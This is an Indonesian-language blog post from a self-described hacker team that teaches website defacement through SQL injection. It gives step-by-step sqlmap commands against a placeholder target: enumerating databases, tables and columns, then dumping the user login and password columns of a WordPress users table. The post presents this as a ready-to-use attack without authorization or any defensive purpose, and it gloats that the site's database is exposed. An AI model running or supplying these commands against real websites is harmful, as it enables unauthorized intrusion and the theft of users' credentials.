GuidePedia

0

INDONESIA HACKER CYBER TEAM

UDah lama kagak Post tentang Deface :v bertemu kembali dengan saya ./Dr.D4fuq404 :D
ane mau share ilmu nihh yaitu 


alat alat yang anda butuhkan :
- DORK SQLmap
- Phyton 2.7
- Script SQLmap
- Internet
- Windows

pertama kita buka CMD lalu ketikan command berikut

sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id
=37 --dbs
atau bisa juga dengan command berikut
 sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id=37 --current-db
lalu tekan  enter,,jika site nya vuln atau vulnerable maka hasilnya akan tampak seperti SS yang ada di bawah ini 
klik untuk memperbesar
untuk tahap selanjutnya lalu ita ketikan command di bawah pada CMD sobat ( sebelumnya sobat sudah menentukan database mana yang ingin sobat lihat )

sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 --tables

maka hasilnya akan tampak seperti yang ada di SS di bawah

klik untuk memperbesar
selanjutnya kita ketikan lagi command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users --columns
maka hasilnya akan tampak seperti ss di bawah
klik untuk memperbesar
langkah selanjutnya kita ketikan command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id
=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users -C user_login,user_pass --dump

 maka hasilnya seperti yang di bawah ini  jreng jreng telanjang dah tuh database website nya 

klik untuk memperbesar 
sebagai catatan buat sobat arti dari command command yang di atas :
--dbs ( memanggil semua database yang ada dalam server )
--current-db ( hanya mengambil database yang terkait di dalam situs web tersebut )
--tables ( memanggil table yang ada di dalam database )
--columns ( memanggil kolom yang ada di dalam database table )
--dump ( memanggil username dan password yg terdapat di dalam database tabel )


Post a Comment

 
Top